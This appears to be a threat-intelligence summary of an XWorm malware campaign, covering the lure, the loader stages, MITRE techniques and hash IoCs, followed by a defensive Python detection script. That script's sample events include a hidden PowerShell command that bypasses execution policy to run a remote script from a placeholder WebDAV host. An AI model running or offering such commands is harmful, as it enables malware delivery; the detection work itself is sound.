Sneaky XWorm Uses MultiStaged Attack – Cyble

Two sentences: Threat actors chain multiple stages and Living Off the Land Binaries (LOLBins) to evade detection while delivering XWorm, fetching a remote PowerShell script over WebDAV from TheDriveHQ and then using BATLoader and VBScript stages to drop and execute the payload. The campaign illustrates XWorm’s versatility as a commodity malware sold to other actors, with the BATLoader chain and WebDAV-hosted scripts as its distinguishing features. #XWorm #BATLoader #WebDAV #PowerShell #TheDriveHQ #CRIL #Cyble

Keypoints

  • Threat actors frequently use multistage attacks and Living Off the Land Binaries (LOLBins) to deploy malware while evading antivirus detection.
  • The initial infection appears to originate from a .lnk file named “Invoice_7729839_PDF.lnk,” likely distributed via spam emails.
  • Opening the .lnk file triggers a PowerShell process with ExecutionPolicy bypass to fetch a remote script via WebDAV from TheDriveHQ.
  • The remote script downloads a zip containing a batch loader (sh.bat); the chain ends with XWorm being injected into a running process.
  • BATLoader is used to load the final payload: an obfuscated batch file that decrypts the next stage with AES, runs it through a renamed copy of the PowerShell executable, and drops a VBScript.
  • The dropped VBScript invokes the self-copied BAT file, which makes the execution chain less conspicuous and avoids some antivirus detections.
  • XWorm is commodity malware with a broad suite of capabilities (data theft, DDoS, clipper, ransomware, etc.) and is marketed for sale (version 4.2 advertised at $400 for a lifetime license).

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The attack begins with a .lnk file named “Invoice_7729839_PDF.lnk.” Given the invoice-themed filename, the .lnk was likely distributed to users as a spam email attachment.
  • [T1059.001] PowerShell – Upon executing the .lnk file, it triggers the launch of a PowerShell process with the “ExecutionPolicy Bypass” option and attempts to access a remote PowerShell script named “sh.ps1.”
  • [T1105] Ingress Tool Transfer – The remote script “sh.ps1” initiates the download of a zip file containing a batch script named “sh.bat” to the victim’s machine.
  • [T1059.003] Windows Command Shell – The BATLoader chain relies on .bat/.cmd execution to load and run the final payload.
  • [T1059.005] VBScript – The dropped VBScript has minimal functionality and primarily serves to run the self-copied BAT file.
  • [T1140] Deobfuscate/Decode Files or Information – The BAT file contains obfuscated content, which after deobfuscation reveals a BATLoader technique involving AES decryption and loading assemblies via PowerShell.
  • [T1071.001] Web Protocols – The PowerShell stage retrieves the remote script and the follow-on payload over WebDAV (HTTP/HTTPS) from TheDriveHQ, so the downloads blend into ordinary web traffic rather than using a bespoke C2 protocol.
  • [T1055] Process Injection – The loader is designed to inject the XWorm code into a running process.

Indicators of Compromise

  • [SHA256] Lnk file – a19a8e6782f0008c3b10276c764962f6f27b27754d826f8d3679ef15bea122d5
  • [SHA256] BATLoader – 9587ef7ba7dfe745e4c98f724110382b7b53f5f7781d1d3fcfc910abacb3fbb8
  • [SHA256] XWorm malware – b64ed641eafbae33d195864576629ae9e922948b59d9f7e6f4fcaafebcc1b1ca
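As an added example (not code from the page or from Cyble), the following Python sketches host-side detection for the chain in the MITRE list above and checks a file inventory against the SHA256 IoCs listed here. The Sysmon-style process-creation records and the file inventory are constructed for the example; hostnames, paths, command lines and every hash other than the three IoCs are invented.

```python
import re
from typing import Dict, List, Tuple

# SHA256 IoCs from the page, keyed to the role of each file in the chain.
XWORM_CHAIN_SHA256 = {
    "a19a8e6782f0008c3b10276c764962f6f27b27754d826f8d3679ef15bea122d5": "Invoice_7729839_PDF.lnk",
    "9587ef7ba7dfe745e4c98f724110382b7b53f5f7781d1d3fcfc910abacb3fbb8": "BATLoader",
    "b64ed641eafbae33d195864576629ae9e922948b59d9f7e6f4fcaafebcc1b1ca": "XWorm",
}

# "-ExecutionPolicy Bypass", including the abbreviated parameter names powershell.exe accepts.
EXEC_POLICY_BYPASS = re.compile(r"(?:^|\s)-(?:ep|ex|exec|executionpolicy)\s+bypass\b", re.I)
# WebDAV-served UNC paths: \\host@SSL\..., \\host@443\..., or any path through DavWWWRoot.
WEBDAV_PATH = re.compile(r"\\\\[\w.-]+@(?:ssl|\d+)\\|\\davwwwroot\\", re.I)
BATCH_FILE = re.compile(r"\.(?:bat|cmd)\b", re.I)
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of the chain-specific rules a process-creation event trips."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    original = event.get("OriginalFileName", "").lower()
    hits: List[str] = []
    # Stage 1 (T1059.001 + T1071): PowerShell with ExecutionPolicy Bypass reading a script over WebDAV.
    if (image in POWERSHELL_IMAGES or original == "powershell.exe") \
            and EXEC_POLICY_BYPASS.search(cmd) and WEBDAV_PATH.search(cmd):
        hits.append("powershell_bypass_webdav")
    # BATLoader: powershell.exe copied under another name; the PE version resource still says PowerShell.EXE.
    if original == "powershell.exe" and image not in POWERSHELL_IMAGES:
        hits.append("renamed_powershell")
    # VBScript stage (T1059.005 -> T1059.003): wscript/cscript spawning cmd.exe to run the self-copied .bat.
    if parent in ("wscript.exe", "cscript.exe") and image == "cmd.exe" and BATCH_FILE.search(cmd):
        hits.append("vbscript_launches_bat")
    return hits


def scan_events(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> rules fired, keeping only events that fired something."""
    results: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            results[i] = hits
    return results


def ioc_matches(inventory: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Match (path, sha256) pairs from a file inventory against the page's IoCs."""
    return [(path, XWORM_CHAIN_SHA256[sha.lower()])
            for path, sha in inventory if sha.lower() in XWORM_CHAIN_SHA256]


# Constructed Sysmon Event ID 1 records reduced to the fields the rules need (all values invented).
SAMPLE_EVENTS = [
    {   # .lnk -> PowerShell pulling sh.ps1 over WebDAV (host and share path are placeholders)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -ep bypass -w hidden -c "& \\example-webdav.invalid@SSL\DavWWWRoot\share\sh.ps1"',
    },
    {   # BATLoader running a renamed copy of powershell.exe (file name invented)
        "Image": r"C:\Users\victim\AppData\Local\Temp\qzxv.exe",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "qzxv.exe -NoProfile -WindowStyle Hidden -Command $null",
    },
    {   # dropped VBScript handing off to the self-copied batch file
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'cmd.exe /c "C:\Users\victim\AppData\Roaming\sh.bat"',
    },
    {   # benign admin script: bypass alone, with a local path, should not fire
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
]

# Constructed EDR-style file inventory; only the two IoC hashes are real, the rest is filler.
SAMPLE_INVENTORY = [
    (r"C:\Users\victim\Downloads\Invoice_7729839_PDF.lnk",
     "a19a8e6782f0008c3b10276c764962f6f27b27754d826f8d3679ef15bea122d5"),
    (r"C:\Users\victim\Downloads\report.pdf", "0" * 64),
    (r"C:\Users\victim\AppData\Roaming\sh.bat",
     "9587EF7BA7DFE745E4C98F724110382B7B53F5F7781D1D3FCFC910ABACB3FBB8"),
    (r"C:\Windows\System32\cmd.exe", "1" * 64),
]

if __name__ == "__main__":
    for idx, rules in scan_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
    for path, label in ioc_matches(SAMPLE_INVENTORY):
        print(f"IoC hit: {path} -> {label}")
```

The first rule deliberately requires both the ExecutionPolicy Bypass switch and a WebDAV path, since bypass alone is routine in administrative scripting; the renamed-PowerShell rule depends on Sysmon’s OriginalFileName field, which survives a file copy, so make sure that field is actually being logged before relying on it.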

Read more: https://cyble.com/blog/sneaky-xworm-uses-multistaged-attack/